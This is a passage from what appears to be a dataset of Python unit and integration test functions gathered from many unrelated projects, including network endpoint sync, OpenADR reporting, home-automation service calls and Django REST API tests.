'l3out', 'intersite-testsuite-app2-epg2'))\n self.assertTrue(self.verify_remote_site_has_entry(mac3, ip3, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app2-epg2'))", "def test_basic_add_multiple_endpoint(self):\n mac1, ip1 = self.setup_with_endpoint()\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app', 'epg2')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry(mac1, ip1, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg1'))\n self.assertTrue(self.verify_remote_site_has_entry(mac2, ip2, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg2'))", "def test_basic_add_multiple_endpoint(self):\n mac1, ip1 = self.setup_with_endpoint()\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app', 'epg')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry(mac1, ip1, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app-epg'))\n self.assertTrue(self.verify_remote_site_has_entry(mac2, ip2, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app-epg'))", "async def test_report_registration_full():\n # Create a server\n logger = logging.getLogger('openleadr')\n logger.setLevel(logging.DEBUG)\n server = OpenADRServer(vtn_id='testvtn')\n server.add_handler('on_register_report', on_register_report_full)\n server.add_handler('on_create_party_registration', on_create_party_registration)\n\n # Create a client\n client = OpenADRClient(ven_name='myven', vtn_url='http://localhost:8080/OpenADR2/Simple/2.0b')\n\n # Add 4 reports\n client.add_report(callback=collect_data,\n report_specifier_id='PowerReport',\n resource_id='Device001',\n measurement='power_real',\n unit='W')\n client.add_report(callback=collect_data,\n report_specifier_id='PowerReport',\n resource_id='Device002',\n measurement='power_real',\n unit='W')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device001',\n measurement='voltage',\n unit='V')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device002',\n measurement='voltage',\n unit='V')\n\n\n await server.run_async()\n # await asyncio.sleep(0.1)\n # Register the client\n await client.create_party_registration()\n\n # Register the reports\n await client.register_reports(client.reports)\n assert len(client.report_requests) == 2\n assert len(server.services['report_service'].report_callbacks) == 4\n await client.stop()\n await server.stop()", "async def test_report_registration():\n # Create a server\n logger = logging.getLogger('openleadr')\n logger.setLevel(logging.DEBUG)\n server = OpenADRServer(vtn_id='testvtn')\n server.add_handler('on_register_report', on_register_report)\n server.add_handler('on_create_party_registration', on_create_party_registration)\n\n # Create a client\n client = OpenADRClient(ven_name='myven', vtn_url='http://localhost:8080/OpenADR2/Simple/2.0b',)\n\n # Add 4 reports\n client.add_report(callback=collect_data,\n report_specifier_id='CurrentReport',\n resource_id='Device001',\n measurement='current',\n unit='A')\n client.add_report(callback=collect_data,\n report_specifier_id='CurrentReport',\n resource_id='Device002',\n measurement='current',\n unit='A')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device001',\n measurement='voltage',\n unit='V')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device002',\n measurement='voltage',\n unit='V')\n\n asyncio.create_task(server.run_async())\n #await asyncio.sleep(1)\n # Register the client\n await client.create_party_registration()\n\n # Register the reports\n await client.register_reports(client.reports)\n assert len(client.report_requests) == 2\n assert len(server.services['report_service'].report_callbacks) == 4\n await client.stop()\n await server.stop()", "def test_basic_add_multiple_endpoint(self):\n args = self.get_args()\n config = self.create_config_file_before()\n self.write_config_file(config, args)\n collector = execute_tool(args, test_mode=True)\n\n time.sleep(2)\n mac1 = '00:11:22:33:33:34'\n ip1 = '3.4.3.5'\n self.add_endpoint(mac1, ip1, 'intersite-testsuite', 'app', 'epg')\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app', 'epg')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry_before(mac1, ip1))\n self.assertTrue(self.verify_remote_site_has_entry_before(mac2, ip2))\n\n config = self.create_config_file_after()\n self.write_config_file(config, args)\n collector.reload_config()\n time.sleep(2)\n self.assertTrue(self.verify_remote_site_has_entry_after(mac1, ip1))\n self.assertTrue(self.verify_remote_site_has_entry_after(mac2, ip2))", "def setUp(self):\n self.staff = get_user_model().objects.create_user(\n email='[email protected]',\n password='staffpassword1234',\n username='staffusername'\n )\n self.staff.is_staff = True\n self.staff.save()\n self.staff.refresh_from_db()\n\n self.client = APIClient()\n self.client.force_authenticate(user=self.staff)\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.id],\n 'overview': '<strong>Bla</strong> bla bla',\n }\n\n \"\"\"Test that list procedure is success\"\"\"\n p1 = models.Procedure.objects.create(\n name=\"procedure1\",\n overview='bla bla bla'\n )\n p1.speciality.set([self.speciality.pk])\n p1.save()\n\n p2 = models.Procedure.objects.create(\n name=\"procedure2\",\n overview='bla bla bla'\n )\n p2.speciality.set([self.speciality.pk])\n p2.save()\n\n res = self.client.get(PROCEDURE_URL)\n\n procedures = models.Procedure.objects.all().order_by(\"-name\")\n ser = serializer.ProcedureSerializer(procedures, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 2)\n self.assertEqual(res.data, ser.data)", "async def test_service_calls(oppio_env, opp, aioclient_mock):\n assert await async_setup_component(opp, \"oppio\", {})\n\n aioclient_mock.post(\"http://127.0.0.1/addons/test/start\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/stop\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/restart\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/update\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/stdin\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/host/shutdown\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/host/reboot\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/snapshots/new/full\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/snapshots/new/partial\", json={\"result\": \"ok\"})\n aioclient_mock.post(\n \"http://127.0.0.1/snapshots/test/restore/full\", json={\"result\": \"ok\"}\n )\n aioclient_mock.post(\n \"http://127.0.0.1/snapshots/test/restore/partial\", json={\"result\": \"ok\"}\n )\n\n await opp.services.async_call(\"oppio\", \"addon_start\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_stop\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_restart\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_update\", {\"addon\": \"test\"})\n await opp.services.async_call(\n \"oppio\", \"addon_stdin\", {\"addon\": \"test\", \"input\": \"test\"}\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 8\n assert aioclient_mock.mock_calls[-1][2] == \"test\"\n\n await opp.services.async_call(\"oppio\", \"host_shutdown\", {})\n await opp.services.async_call(\"oppio\", \"host_reboot\", {})\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 10\n\n await opp.services.async_call(\"oppio\", \"snapshot_full\", {})\n await opp.services.async_call(\n \"oppio\",\n \"snapshot_partial\",\n {\"addons\": [\"test\"], \"folders\": [\"ssl\"], \"password\": \"123456\"},\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 12\n assert aioclient_mock.mock_calls[-1][2] == {\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"password\": \"123456\",\n }\n\n await opp.services.async_call(\"oppio\", \"restore_full\", {\"snapshot\": \"test\"})\n await opp.services.async_call(\n \"oppio\",\n \"restore_partial\",\n {\n \"snapshot\": \"test\",\n \"openpeerpower\": False,\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"password\": \"123456\",\n },\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 14\n assert aioclient_mock.mock_calls[-1][2] == {\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"openpeerpower\": False,\n \"password\": \"123456\",\n }", "def test_get_next_to_arrive(self, mock_requests):\n\n r = services.get_next_to_arrive(self.a, self.b)\n params = {'req1': self.a, 'req2': self.b}\n\n self.assertTrue(\n mock.call.get(services.SEPTA_NEXTTOARRIVE_URL, params=params) in\n mock_requests.mock_calls)", "def test_API(self):\n print(\"Test API ...\")\n t0 = time.time()\n c = 0\n for trip_headsign in TRIP_HEADSIGN:\n for stop in STOP_A:\n payload = {'format': 'json', 'route_id': \"A\", 'trip_headsign': trip_headsign, 'stop_name': stop}\n req = requests.get('https://applications002.brest-metropole.fr/WIPOD01/Transport/REST/getRemainingTimes',params=payload)\n if len(req.text) < 100 : #API answer 189 characters if it works well\n print(\"API not responding for parameters : {}, {} \".format(trip_headsign, stop))\n c += 1\n else :\n print(\"Params : {}, {} : {}\".format(trip_headsign, stop, req.text))\n duration = time.time() - t0\n print(\"END OF TEST : duration : {} s, {} requests failed\".format(duration, c))", "def test_restart_application(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # first call to this function tells that job is still in progress\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "async def test_api_call_service_no_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\"\"\"\n test_value.append(1)\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n await mock_api_client.post(\"/api/services/test_domain/test_service\")\n await hass.async_block_till_done()\n assert len(test_value) == 1", "def test_basic_add_multiple_endpoint(self):\n args = self.get_args()\n config = self.create_config_file()\n self.write_config_file(config, args)\n execute_tool(args, test_mode=True)\n\n time.sleep(2)\n mac1 = '00:11:22:33:33:34'\n ip1 = '3.4.3.5'\n self.add_endpoint(mac1, ip1, 'intersite-testsuite', 'app', 'epg')\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app', 'epg')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry_with_provided_contract(mac1, ip1, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg', 'contract-1'))\n self.assertTrue(self.verify_remote_site_has_entry_with_provided_contract(mac2, ip2, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg', 'contract-1'))", "def testApi(self):", "async def test_action(\n hass: HomeAssistant,\n entity_registry: er.EntityRegistry,\n enable_custom_integrations: None,\n) -> None:\n entry = entity_registry.async_get_or_create(DOMAIN, \"test\", \"5678\")\n\n assert await async_setup_component(\n hass,\n automation.DOMAIN,\n {\n automation.DOMAIN: [\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_open\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"open\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_close\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"close\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_stop\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"stop\",\n },\n },\n ]\n },\n )\n await hass.async_block_till_done()\n\n open_calls = async_mock_service(hass, \"cover\", \"open_cover\")\n close_calls = async_mock_service(hass, \"cover\", \"close_cover\")\n stop_calls = async_mock_service(hass, \"cover\", \"stop_cover\")\n\n hass.bus.async_fire(\"test_event_open\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 0\n assert len(stop_calls) == 0\n\n hass.bus.async_fire(\"test_event_close\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n assert len(stop_calls) == 0\n\n hass.bus.async_fire(\"test_event_stop\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n assert len(stop_calls) == 1\n\n assert open_calls[0].domain == DOMAIN\n assert open_calls[0].service == \"open_cover\"\n assert open_calls[0].data == {\"entity_id\": entry.entity_id}\n assert close_calls[0].domain == DOMAIN\n assert close_calls[0].service == \"close_cover\"\n assert close_calls[0].data == {\"entity_id\": entry.entity_id}\n assert stop_calls[0].domain == DOMAIN\n assert stop_calls[0].service == \"stop_cover\"\n assert stop_calls[0].data == {\"entity_id\": entry.entity_id}", "def test_data_framing(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"x\" * 100\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n for byte in request_body[:-1]:\n deproxy_cl.make_request(request=byte, end_stream=False)\n deproxy_cl.make_request(request=request_body[-1], end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "def test_start_post(self):\n StartConfiguration = StartConfiguration()\n response = self.client.open(\n '/start',\n method='POST',\n data=json.dumps(StartConfiguration),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_simple_request(self):\n urls = [\"https://api.omniture.com/admin/1.4/rest/\",\n \"https://api2.omniture.com/admin/1.4/rest/\",\n \"https://api3.omniture.com/admin/1.4/rest/\",\n \"https://api4.omniture.com/admin/1.4/rest/\",\n \"https://api5.omniture.com/admin/1.4/rest/\"]\n self.assertIn(self.analytics.request('Company', 'GetEndpoint'),urls, \"Company.GetEndpoint failed\" )", "def test_get_one_flow_requests_as_super_client(self):\n headers = self._get_oauth_header(client_name=DISPATCHER_NAME)\n res = self.client.get('/v1/flow_requests/p_11111/', **headers)\n self.assertEqual(res.status_code, 200)\n profile = {\n 'code': 'PROF_001',\n 'version': 'v0',\n 'payload': '[{\"clinical_domain\": \"Laboratory\"}]'\n }\n expected = {\n 'flow_id': 'f_11111',\n 'process_id': 'p_11111',\n 'status': 'PE',\n 'profile': profile,\n 'sources': [{\n 'source_id': SOURCE_1_ID,\n 'name': SOURCE_1_NAME,\n 'profile': profile\n }],\n 'start_validity': '2017-10-23T10:00:00+02:00',\n 'expire_validity': '2018-10-23T10:00:00+02:00'\n }\n self.assertDictEqual(res.json(), expected)", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device\n response = self.client.post(self.incoming_url, call_data)\n\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_restart_process(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_process(0, 'appli:*', 'arg list', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', 'arg list','wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_process(0, 'appli:*', '', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', '', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "def test_get_query_with_api_key(self):\r\n users = UserFactory.create_batch(3)\r\n app = AppFactory.create(owner=users[0], info={'total': 150})\r\n task = TaskFactory.create(app=app, info={'url': 'my url'})\r\n taskrun = TaskRunFactory.create(task=task, user=users[0],\r\n info={'answer': 'annakarenina'})\r\n for endpoint in self.endpoints:\r\n url = '/api/' + endpoint + '?api_key=' + users[1].api_key\r\n res = self.app.get(url)\r\n data = json.loads(res.data)\r\n\r\n if endpoint == 'app':\r\n assert len(data) == 1, data\r\n app = data[0]\r\n assert app['info']['total'] == 150, data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'task':\r\n assert len(data) == 1, data\r\n task = data[0]\r\n assert task['info']['url'] == 'my url', data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'taskrun':\r\n assert len(data) == 1, data\r\n taskrun = data[0]\r\n assert taskrun['info']['answer'] == 'annakarenina', data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'user':\r\n assert len(data) == 3, data\r\n user = data[0]\r\n assert user['name'] == 'user1', data\r\n assert res.mimetype == 'application/json', res", "def test_basic_add_multiple_endpoint(self):\n args = self.get_args()\n config = self.create_config_file('l3out1')\n self.write_config_file(config, args)\n collector = execute_tool(args, test_mode=True)\n\n time.sleep(2)\n mac1 = '00:11:22:33:33:34'\n ip1 = '3.4.3.5'\n self.add_endpoint(mac1, ip1, 'intersite-testsuite', 'app', 'epg')\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app', 'epg')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry(mac1, ip1, 'intersite-testsuite',\n 'l3out1', 'intersite-testsuite-app-epg'))\n self.assertTrue(self.verify_remote_site_has_entry(mac2, ip2, 'intersite-testsuite',\n 'l3out1', 'intersite-testsuite-app-epg'))\n\n config = self.create_config_file('l3out2')\n self.write_config_file(config, args)\n collector.reload_config()\n time.sleep(2)\n self.assertTrue(self.verify_remote_site_has_entry(mac1, ip1, 'intersite-testsuite',\n 'l3out2', 'intersite-testsuite-app-epg'))\n self.assertTrue(self.verify_remote_site_has_entry(mac2, ip2, 'intersite-testsuite',\n 'l3out2', 'intersite-testsuite-app-epg'))", "def test_request_created_once(self):\n\n usual_user = UserFactory(\n username='Usual User',\n email='[email protected]',\n )\n token = Token.objects.get(user=usual_user)\n self.client.credentials(\n HTTP_AUTHORIZATION=f'Token {token.key}')\n data = {'team': self.team.id}\n self.client.post(reverse('api:user-team-requests-list'), data=data) # first request\n response = self.client.post(reverse('api:user-team-requests-list'), data=data) # second request\n self.assertEqual(response.status_code, forum_status.STATUS_222_USER_ALREADY_REQUESTED)", "def setUp(self):\n self.schedule_route_url = api_reverse('route:schedule-route')\n self.login_url = api_reverse('authentication:user-login')\n self.join_route_url = api_reverse('route:join-route')\n self.retrieve_route_url = api_reverse('route:retrieve-route')\n self.register_vehicle_url = api_reverse('vehicle:register-vehicle')\n\n\n\n\n self.user_one = User.objects.create_user(\n first_name='jane1',\n last_name='Doe1',\n surname='jDoe1',\n email='[email protected]',\n password='janeDoe@123',\n id_number=1223,\n phone_number=\"+254712534545\",\n is_active=True)\n\n self.user_two = User.objects.create_user(\n first_name='rose',\n last_name='mary',\n surname='mary',\n email='[email protected]',\n username=\"rosemary\",\n password='janeDoe@123',\n id_number=122843,\n phone_number=\"+2547129743545\",\n is_active=True)\n\n self.user_three = User.objects.create_user(\n first_name='Three',\n last_name='Mine',\n surname='James',\n email='[email protected]',\n username=\"Three\",\n password='janeDoe@123',\n id_number=1228444,\n phone_number=\"+2547179743545\",\n is_active=True)\n\n self.valid_route_details = {\n \"destination\": {\"latitude\": 37.0625,\"longitude\": -95.677068},\n \"starting_point\": {\"latitude\": 37.0625,\"longitude\": -95.677068},\n \"commuting_time\": \"17:00\"\n }\n self.valid_route_two_details = {\n \"destination\": {\"latitude\": 31.0625,\"longitude\": -95.677068},\n \"starting_point\": {\"latitude\": 31.0625,\"longitude\": -95.677068},\n \"commuting_time\": \"17:00\"\n }\n\n self.valid_user_login_details = {\n 'email': '[email protected]',\n 'password': 'janeDoe@123',\n }\n self.valid_user_two_login_details = {\n 'email': '[email protected]',\n 'password': 'janeDoe@123',\n }\n self.valid_user_three_login_details = {\n 'email': '[email protected]',\n 'password': 'janeDoe@123',\n }\n self.token = self.login_user().data['token']\n self.token_two = self.login_user_two().data['token']\n self.token_three = self.login_user_three().data['token']\n self.route ={\n 'route':self.get_route_object().id\n }\n\n self.valid_vehicle_details = {\n \"registration_number\": \"KAC236Q\",\n \"capacity\": \"5\"\n }\n vehicle = self.register_vehicle()\n self.vehicle_id = {\n 'vehicle': vehicle.id\n }", "def testLoadTestRequestsMultipleUsers(self):\n user_list = ['alice', 'bob', 'charles']\n def sendRequestExpect200():\n for user in user_list:\n response = requests.get(\"http://localhost:%d/weather/%s\" % (self.port_number, user))\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.text, 'cloudy')\n # Subscribe all users to weather updates so that messages\n # are persisted when posted.\n for user in user_list:\n response = requests.post(\"http://localhost:%d/weather/%s\" % (self.port_number, user), data='')\n self.assertEqual(response.status_code, 200)\n # Check that server stays up when subjected to requests from multiple users.\n self.runMultipleRequests(50, sendRequestExpect200)", "def test_normal_operation(self, mocker):\n api = mocker.Mock(spec=TelemetryAPI)\n api.record_unique_keys.return_value = HttpResponse(200, '')\n\n unique_keys_tracker = UniqueKeysTracker()\n unique_keys_tracker.track(\"key1\", \"split1\")\n unique_keys_tracker.track(\"key2\", \"split1\")\n\n unique_keys_sync = UniqueKeysSynchronizer(mocker.Mock(), unique_keys_tracker)\n task = UniqueKeysSyncTask(unique_keys_sync.send_all, 1)\n task.start()\n time.sleep(2)\n assert task.is_running()\n assert api.record_unique_keys.mock_calls == mocker.call()\n stop_event = threading.Event()\n task.stop(stop_event)\n stop_event.wait(5)\n assert stop_event.is_set()", "def run_single_test(self, config):\n path_name = config['path_name']\n for request in config['request']:\n with self.subTest(request=request, test_name=config['test_name']):\n if 'args' in request:\n url = reverse(path_name, kwargs=request['args'])\n else:\n url = reverse(path_name)\n\n query_params = None\n if 'query_params' in request:\n query_params = urlencode(request['query_params'])\n url = '{}?{}'.format(url, query_params)\n\n data = None\n data_format = 'json'\n if 'data' in request:\n data = request['data']\n\n if 'data_format' in request:\n data_format = request['data_format']\n\n response_check = None\n if 'response_check' in request:\n response_check = request['response_check']\n\n self.call_api(\n url,\n data,\n self.tokens[request['user']],\n request['status'],\n config['type'],\n data_format=data_format,\n response_check=response_check)", "async def test_report_registration_with_status_report():\n # Create a server\n logger = logging.getLogger('openleadr')\n logger.setLevel(logging.DEBUG)\n server = OpenADRServer(vtn_id='testvtn')\n server.add_handler('on_register_report', on_register_report)\n server.add_handler('on_create_party_registration', on_create_party_registration)\n\n # Create a client\n client = OpenADRClient(ven_name='myven', vtn_url='http://localhost:8080/OpenADR2/Simple/2.0b',)\n\n # Add 4 reports\n client.add_report(callback=collect_data,\n report_specifier_id='CurrentReport',\n resource_id='Device001',\n measurement='current',\n unit='A')\n client.add_report(callback=collect_data,\n report_specifier_id='CurrentReport',\n resource_id='Device002',\n measurement='current',\n unit='A')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device001',\n measurement='voltage',\n unit='V')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device002',\n measurement='voltage',\n unit='V')\n client.add_report(callback=collect_status,\n report_name='TELEMETRY_STATUS',\n report_specifier_id='StatusReport',\n resource_id='Device001')\n\n asyncio.create_task(server.run_async())\n # await asyncio.sleep(1)\n # Register the client\n await client.create_party_registration()\n\n # Register the reports\n await client.register_reports(client.reports)\n assert len(client.report_requests) == 3\n assert len(server.services['report_service'].report_callbacks) == 5\n await client.stop()\n await server.stop()", "def test_subscriber_access_for_two_vsg_services(self):", "def test_WINNF_FT_S_REG_18(self):\n\n # Register the devices\n device_a = json.load(\n open(os.path.join('testcases', 'testdata', 'device_a.json')))\n device_b = json.load(\n open(os.path.join('testcases', 'testdata', 'device_b.json')))\n device_c = json.load(\n open(os.path.join('testcases', 'testdata', 'device_c.json')))\n devices = [device_a, device_b, device_c]\n for device in devices:\n self._sas_admin.InjectFccId({'fccId': device['fccId']})\n device['measCapability'] = []\n request = {'registrationRequest': devices}\n response = self._sas.Registration(request)['registrationResponse']\n # Check registration response\n for resp in response:\n self.assertTrue('cbsdId' in resp)\n self.assertEqual(resp['response']['responseCode'], 0)\n del request, response\n\n # Blacklist the third device\n self._sas_admin.BlacklistByFccId({'fccId':device_c['fccId']})\n\n # Re-register the devices\n request = {'registrationRequest': devices}\n response = self._sas.Registration(request)['registrationResponse']\n\n # Check registration response\n self.assertEqual(len(response), len(devices))\n for response_num, resp in enumerate(response[:2]):\n self.assertEqual(resp['response']['responseCode'], 0)\n self.assertTrue('cbsdId' in resp)\n self.assertFalse('measReportConfig' in resp)\n self.assertFalse('measReportConfig' in response[2])\n self.assertEqual(response[2]['response']['responseCode'], 101)", "def test_1():\n\tassert api_call().status_code == 200", "def test():\n request = pb2.TestRequest.FromString(flask.request.get_data())\n logger.debug(\"Flask service received: %s\", 